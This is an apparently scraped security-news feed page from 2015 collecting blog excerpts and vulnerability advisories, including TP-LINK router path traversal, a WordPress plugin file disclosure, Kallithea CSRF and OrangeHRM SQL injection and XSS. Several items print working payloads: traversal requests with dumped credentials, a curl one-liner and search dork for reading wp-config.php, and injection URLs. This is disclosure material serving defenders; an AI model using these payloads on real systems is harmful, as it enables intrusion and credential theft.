Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

Wawa Rewards Gift Card Takeover Vulnerability

April 10, 2015, 3:03 am
$
0
0
Wawa stores are a favorite among customers in Pennsylvania, New Jersey, Delaware, and beyond. When the company recently announced a new Android app to launch with their rewards program, I was interested in installing it and researching how it worked. Soon after registering and associating a gift card to my account, I discovered a serious vulnerability that would allow an attacker to arbitrarily associate gift cards to his account. Since the app does not require physical access to the card in order to be used at the register, the attacker could then use the remaining balances on the cards.

more here........http://randywestergren.com/wawa-rewards-gift-card-takeover-vulnerability/
Search

Simple guided fuzzing for libraries using LLVM's new libFuzzer

April 10, 2015, 3:49 am
$
0
0
Fuzzing (or fuzz testing) is becoming increasingly popular. Fuzzing Clang and fuzzing with Clang is not new: Clang-based AddressSanitizer has been used for fuzz-testing the Chrome browser for several years and Clang itself has been extensively fuzzed using csmith and, more recently, using AFL. Now we’ve closed the loop and started to fuzz parts of LLVM (including Clang) using LLVM itself.

LibFuzzer, recently added to the LLVM tree, is a library for in-process fuzzing that uses Sanitizer Coverage instrumentation to guide test generation. With LibFuzzer one can implement a guided fuzzer for some library by writing one simple function:
extern "C" void TestOneInput(const uint8_t *Data, size_t Size);

more here........http://blog.llvm.org/2015/04/fuzz-all-clangs.html

Extracting the Private Key from a TREZOR

April 10, 2015, 3:53 am
$
0
0
There were some discussions on reddit whether TREZOR can be attacked using side channels like power fluctuations, electromagnetic radiations or similar. Usually these discussion mention the signing code. To sign a message, you need to enter the PIN first. So this is not useful in the scenario where you need physical access to perform a side channel attack.

However, also the generation of the public key may leak some information via a side channel. Until firmware 1.3.2 of TREZOR this was not PIN protected. Therefore, I investigated whether it is possible to use a side channel to recover the private key from the public key computation.

more here.........http://johoe.mooo.com/trezor-power-analysis/

SEC Consult SA-20150410-0 :: Unauthenticated Local File Disclosure in multiple TP-LINK products (CVE-2015-3035)

April 10, 2015, 6:33 am
$
0
0
SEC Consult Vulnerability Lab Security Advisory < 20150410-0 >
=======================================================================
              title: Unauthenticated Local File Disclosure
            product: Multiple TP-LINK products (see Vulnerable / tested versions)
 vulnerable version: Multiple (see Vulnerable / tested versions)
      fixed version: see Solution
         CVE number: CVE-2015-3035
             impact: Critical
           homepage: http://tp-link.com
              found: 2015-02-19
                 by: Stefan Viehböck (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Berlin - Frankfurt/Main - Montreal - Singapore
                     Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"TP-LINK is a global provider of SOHO & SMB networking products and the World's
No.1 provider of WLAN products, with products available in over 120 countries
to tens of millions customers. Committed to intensive R&D, efficient production
and strict quality management, TP-LINK continues to provide award-winning
networking products in Wireless, ADSL, Routers, Switches, IP Cameras, Powerline
Adapters, Print Servers, Media Converters and Network Adapters for Global
end-users."

Source: http://www.tp-link.us/about/?categoryid=102


Business recommendation:
------------------------
Attackers can read sensitive configuration files without prior authentication.
These files e.g. include the administrator credentials and the WPA passphrase.

TP-LINK has provided fixed firmware which should be installed immediately.


Vulnerability overview/description:
-----------------------------------
Because of insufficient input validation, arbitrary local files can be
disclosed. Files that include passwords and other sensitive information can
be accessed.


Proof of concept:
-----------------
The following HTTP request shows how directory traversal can be used to gain
access to files without prior authentication:
===============================================================================
GET /login/../../../etc/passwd HTTP/1.1
Host: $host

===============================================================================

The server response includes the contents of the file:
===============================================================================
HTTP/1.1 200 OK
Server: Router Webserver
Connection: Keep-Alive
Keep-Alive:
Persist:
WWW-Authenticate: Basic realm="TP-LINK Wireless Dual Band Gigabit Router WDR4300"
Content-Length: 683
Content-Type: text/html
root:x:0:0:root:/root:/bin/sh
Admin:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:65534:65534:nobody:/home:/bin/sh
ap71:x:500:0:Linux User,,,:/root:/bin/sh
dropbear:x:500:500:dropbear:/tmp/dropbear:/bin/sh
admin:x:500:500:admin:/home:/bin/sh
guest:x:500:500:guest:/home:/bin/sh
dropbear:x:500:500:dropbear:/tmp/dropbear:/bin/sh
dropbear:x:500:500:dropbear:/tmp/dropbear:/bin/sh
===============================================================================

Several sensitive files can be read. These include:
Files containing Wi-Fi configuration including WPA-passphrase:
/login/../../../tmp/ath.ap_bss
/login/../../../tmp/ath1.ap_bss

A file containing administrator credentials (format: $user:md5($password), which can
be brute-forced very efficiently:
/login/../../../tmp/dropbear/dropbearpwd


Example server response:
===============================================================================
HTTP/1.1 200 OK
Server: Router Webserver
Connection: Keep-Alive
Keep-Alive:
Persist:
WWW-Authenticate: Basic realm="TP-LINK Wireless Dual Band Gigabit Router WDR4300"
Content-Length: 56
Content-Type: text/html
username:admin
password:11d0fc2ff3e7862d8a3f9b280e6d390c
===============================================================================


Vulnerable / tested versions:
-----------------------------
The vulnerability affects the following products:
TP-LINK Archer C5 (Hardware version 1.2)
TP-LINK Archer C7 (Hardware version 2.0)
TP-LINK Archer C8 (Hardware version 1.0)
TP-LINK Archer C9 (Hardware version 1.0)
TP-LINK TL-WDR3500 (Hardware version 1.0)
TP-LINK TL-WDR3600 (Hardware version 1.0)
TP-LINK TL-WDR4300 (Hardware version 1.0)
TP-LINK TL-WR740N (Hardware version 5.0)
TP-LINK TL-WR741ND (Hardware version 5.0)
TP-LINK TL-WR841N (Hardware version 9.0)
TP-LINK TL-WR841N (Hardware version 10.0)
TP-LINK TL-WR841ND (Hardware version 9.0)
TP-LINK TL-WR841ND (Hardware version 10.0)


Vendor contact timeline:
------------------------
2015-02-19: Contacting vendor through support@tp-link.com.
2015-02-24: Resending email as previous ticket has been closed by TP-LINK.
2015-02-24: Contacting technical support engineer of TP-LINK, contact received
            by 3rd party.
2015-02-25: Requesting encryption keys, providing affected models.
2015-02-26: No encryption keys available, sending advisory in unencrypted form.
2015-02-28: Vendor confirms vulnerability, provides beta firmware.
2015-03-03: Sending confirmation that beta firmware fixes the vulnerability.
2015-03-06: Vendor is working on release schedule, affected devices.
2015-03-16: Vendor announces that fixed firmware will be released by the end of
            March.
2015-03-24: Vendor confirms that firmware releases are on schedule.
2015-04-08: Vendor provides final list of affected products & download URLs.
2015-04-10: Coordinated release of security advisory.


Solution:
---------
Update to the most recent firmware version:
TP-LINK Archer C5 (Hardware version 1.2): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13048
TP-LINK Archer C7 (Hardware version 2.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13008
TP-LINK Archer C8 (Hardware version 1.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13052
TP-LINK Archer C9 (Hardware version 1.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13020
TP-LINK TL-WDR3500 (Hardware version 1.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13018
TP-LINK TL-WDR3600 (Hardware version 1.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13019
TP-LINK TL-WDR4300 (Hardware version 1.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13009
TP-LINK TL-WR740N (Hardware version 5.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13012
TP-LINK TL-WR741ND (Hardware version 5.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13013
TP-LINK TL-WR841N (Hardware version 9.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13033
TP-LINK TL-WR841N (Hardware version 10.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13036
TP-LINK TL-WR841ND (Hardware version 9.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13035
TP-LINK TL-WR841ND (Hardware version 10.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13037


Workaround:
-----------
See solution.


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Stefan Viehböck / @2015

The Beginner’s Guide to IDAPython- (Its Free But Author Would Love A Donation For All The Hard Work)

April 10, 2015, 7:25 am
$
0
0
This is a book about IDAPython.
I originally wrote it as a reference for myself - Iwanted a place to go to where I could find
examples of functions that I commonly use (and forget) in IDAPython. Since I started this
book I have used it many times as a quick reference to understand syntax or see an example
of some code - if you follow my blog you may notice a few familiar faces – lots of scripts
that I cover here are result of sophomoric experiments that I documented online.
Over the years I have received numerous emails asking what is the best guide for learning
IDAPython. Usually I will point them to to Ero Carrera’s Introduction to IDAPython or the
example scripts in the IDAPython’s public repo. They are excellent sources for learning but
they don’t cover some common issues that I have come across. I wanted to create a book
that covers these issues.I feel this book will be of value for anyone learning IDAPython or
wanting a quick reference for examples and snippets. Being an e-book it will not be a static
document and I plan on updating it in the future on regular basis

more here.......https://leanpub.com/IDAPython-Book

Oh Yeah! Reversing Belkin’s WPS Pin Algorithm

April 10, 2015, 8:11 am
$
0
0
After finding D-Link’s WPS algorithm, I was curious to see which vendors might have similar algorithms, so I grabbed some Belkin firmware and started dissecting it. This particular firmware uses the SuperTask! RTOS, and in fact uses the same firmware obfuscation as seen previously on the Linksys WRT120N

more here.........http://www.devttys0.com/2015/04/reversing-belkins-wps-pin-algorithm/

eCryptfs v1 hash dictionary

April 10, 2015, 8:13 am
$
0
0
In previous versions of eCryptfs-utils, the signature of the wrapping key consisted of 65337 iterations of SHA-512 of the user password with the default 0x0011223344556677. This behaviour leads to precomputed dictionary and rainbow table attacks on the user password of systems using eCryptfs for home folder encryption. I provide a precomputed dictionary of the rockyou password list here........https://github.com/sylvainpelissier/ecryptfs-dictionary-v1

Meet 'The Great Cannon', China's audacious new hacking weapon

April 10, 2015, 8:16 am
$
0
0
The relentless days-long cyberattack on GitHub showed that someone was willing to use hundreds of thousands of innocent internet users to try to take down two single pages set up by an organization fighting Chinese censorship.

A group of cybersleuths has discovered that someone is indeed China, as everyone suspected. More importantly, they’ve also learned that the attack was carried out with a powerful new cyberweapon, whose existence was previously unknown.

more here.......http://motherboard.vice.com/read/the-great-cannon-is-chinas-powerful-new-hacking-weapon
Search

Exploit for Samba vulnerabilty (CVE-2015-0240)

April 10, 2015, 9:39 am
$
0
0
Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya

The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by
ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'
in libtalloc does not write a value on 'creds' address.

Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/

Note:
- heap might be changed while running exploit, need to try again (with '-hs' or '-pa' option)
  if something failed

more here..........https://gist.github.com/worawit/051e881fc94fe4a49295

Fusion Engage v1.0.5 (WordPress Plugin) Local File Disclosure

April 10, 2015, 12:20 pm
$
0
0
Fusion Engage is a commercial wordpress plugin sold by internet marketer (and known scammer) Precious Ngwu to.. I'm actually not sure. Something to do with video embedding.

Anyway, it has a LFD. Here's the relevant code..

function fe_get_sv_html(){
        global $wpdb, $video_db, $ann_db;

        print(file_get_contents($_POST['video']));

        wp_die();
    }add_action('wp_ajax_nopriv_fe_get_sv_html', 'fe_get_sv_html');add_action('wp_ajax_fe_get_sv_html', 'fe_get_sv_html');

So, you can exploit it easily... quick curl one-liner to get wp-config.php:
curl --data "action=fe_get_sv_html&video=../wp-config.php" "http://exploitable-site/wp-admin/admin-ajax.php"

Precious Ngwu cares not at all about support, and last time I found security issues in his products he did not reply to me whatsoever. So, full disclosure on this one straight away, maybe someone else can contact him and "convince" him to put out an update, all I say to that is: good luck...

Quick google dork: inurl:plugins inurl:fusion-engage

- slipstream/raylee - twitter: @TheWack0lian

CVE-2015-0276: Kallithea: Lack of CSRF attack protection enables gaining unauthorised access to users' accounts

April 10, 2015, 12:23 pm
$
0
0 
We have recently discovered a security issue in Kallithea [0].
API key of repository's creator is exposed by get_repo API method.

Synopsis
========

A vulnerability has been found in Kallithea, allowing attackers to gain
unauthorised access to account of a logged in user.

Description
===========

Pages presentings forms to the user and accepting user's input don't
provide synchronisation tokens to prevent cross-site request forgery.

It is possible to change an email address of a user by tricking them
into clicking a link that initiates the following HTTP request:

    POST /_admin/my_account HTTP/1.1
    Host: <DELETED>
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:35.0)
    Gecko/20100101 Firefox/35.0 Accept:
    text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate
    Referer: http://burp/show/1
    Cookie: kallithea=<DELETED>
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 146


username=myAccount&extern_name=kallithea&extern_type=kallithea&firstname=myFirstname&lastname=myLastname&email=emailAddress%40example.com&save=Save

After this, the attacker can request a password reset, the link is then
sent to their new email address. Then the attacker changes the email
address back to the original, and doesn't log out, saving the cookie.

At this point, the attacker has full access to the user's account. The
user can't login (the password has changed), but might think that he
forgot their password, has an account lockout, or an expired account.
The user does a password reset, but the attacker still has the access.

Impact
======

The vulnerability allows attacker to steal account of an active user by
using social engineering techniques. In the case the user also has
administrator rights, it is possible for the attacker to gain full
administrator access to the Kallithea instance.

Resolution
==========

Kallithea project has fixed this issue by adding CSRF checks to the form
generation code. Before the fix, there none of the forms had CSRF
protection, with the fix, all POST forms are protected against CSRF.

There's no fix as a standalone patch, however; instead, it is
recommended to upgrade to the latest 0.2 release which includes lots of
other changes and improvements.

Affected versions
=================

The issue is currenly present in all Kallithea versions before 0.2.

References
==========

[0] Kallithea Project
<https://kallithea-scm.org/>

[1] CVE-2015-0276
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0276>

[2] Kallithea: Security Notice CVE-2015-0276
<https://kallithea-scm.org/security/cve-2015-0276.html>

-- 
Cheers,
  Andrew Shadura
  on behalf of Kallithea Security Team

64-bit Linux Stack Smashing Tutorial: Part 1

April 10, 2015, 12:59 pm

Hacking the D-Link DIR-890L

April 10, 2015, 9:32 pm
$
0
0
The past 6 months have been incredibly busy, and I haven’t been keeping up with D-Link’s latest shenanigans. In need of some entertainment, I went to their web page today and was greeted by this atrocity:
D-Link's $300 DIR-890L router
D-Link’s $300 DIR-890L router
I think the most “insane” thing about this router is that it’s running the same buggy firmware that D-Link has been cramming in their routers for years…and the hits just keep on coming.

Hookish

April 11, 2015, 1:07 am

VBS Malware Tied To Media Attacks

April 11, 2015, 6:12 am
$
0
0
A malware that is being tied to the recent cyber attack in France is detected by Trend Micro as a variant of the NJWORM/KJWORM remote access Trojan (RAT). This malware (with the MD5 hash of 2962c44ce678d6ca1246f5ead67d115a), which we detect as VBS_KJWORM.SMA, is backdoor that may have been around since 2014.

Ties to previous targeted attacks

Our initial analysis shows that VBS_KJWORM.SMA was created by a hacking tool named Sec-wOrm 1.2 Fixed vBS Controller. This is a RAT generator that we detect as HKTL_KJWORM.

more here.............http://blog.trendmicro.com/trendlabs-security-intelligence/
Search

Reverse Engineering Vectored Exception Handlers: Functionality (2/3)

April 11, 2015, 11:17 am

OrangeHRM Blind SQL Injection & XSS Vulnerabilities

April 11, 2015, 11:53 am
$
0
0
I. Overview
========================================================
OrangeHRM (Opensource 3.2.1, Professional & Enterprise 4.11) are prone to a multiple Blind SQL injection & XSS vulnerabilities. These vulnerabilities allows an attacker to inject SQL commands to compromise the affected database management system in HRM, perform operations on behalf of affected victim, redirect them to malicious sites, steal their credentials, and more.

II. Severity
========================================================
Rating: High
Remote: Yes
Authentication Require: Yes
CVE-ID:

III. Vendor's Description of Application
========================================================

OrangeHRM Solutions

Effective HR tools and options to suit your needs Start-up, SME, global enterprises, whichever one you may be, OrangeHRM offers you flexibility and freedom to select from free and paid versions of OrangeHRM backed with specialized expertise. Our HR modules cover many major human capital management extents. OrangeHRM is used by millions of users around the world in all industries. Explore our solutions and contact our consultants to assist you with your selection process.

http://www.orangehrm.com/


IV. Vulnerability Details & Exploit
========================================================
1) Blind SQL Injection


Request Method = GET

a) /symfony/web/index.php/leave/getFilteredEmployeeCountAjax?location=-1)+or+(31337=31337)+and+(20=20&subunit=0

Request Method = POST

b) /symfony/web/index.php/recruitment/viewCandidates
           sortField=[BSQLi]

__________________________________________________________

2) Multiple Reflected XSS

Request Method = GET

a) /symfony/web/index.php/admin/saveJobTitle?jobTitleId=1';+confirm(0);+//

Request Method = POST

b) /symfony/web/index.php/performance/saveReview
          saveReview360Form[reviewId] = [XSS Payload]
          saveReview = [XSS Payload]


VI. Affected Systems
========================================================
Software: OrangeHRM
Version:  OrangeHRM Opensource 3.2.1 or prior
   OrangeHRM Professional & Enterprise 4.11 or prior
Solution (Fix): No

VII. Vendor Response/Solution
========================================================
Vendor Contacted : 02/12/2015
Vendor Response : 02/12/2015
Shared Technical Details/Poc : 02/13/2015
Again Vendor Contacted : 03/04/2015
Vendor Response: No Response
Advisory Release : 04/10/2015

VIII.Credits
========================================================
Discovered by Rehan Ahmed
knight_rehan@hotmail.com

Introducing filighting and the future of DFIR tools, part 3 – more examples

April 11, 2015, 9:33 pm

Huthos VPS Provider: Totally legit, 1000% not a criminal organization

April 12, 2015, 2:39 am

Facts and Myths about Python names and values - PyCon 2015 (Video)

April 12, 2015, 9:46 am
$
0
0
The behavior of names and values in Python can be confusing. Like many parts of Python, it has an underlying simplicity that can be hard to discern, especially if you are used to other programming languages

more here.........https://www.youtube.com/watch?v=_AEJHKGk9ns
Viewing all 8064 articles
Browse latest View live
Search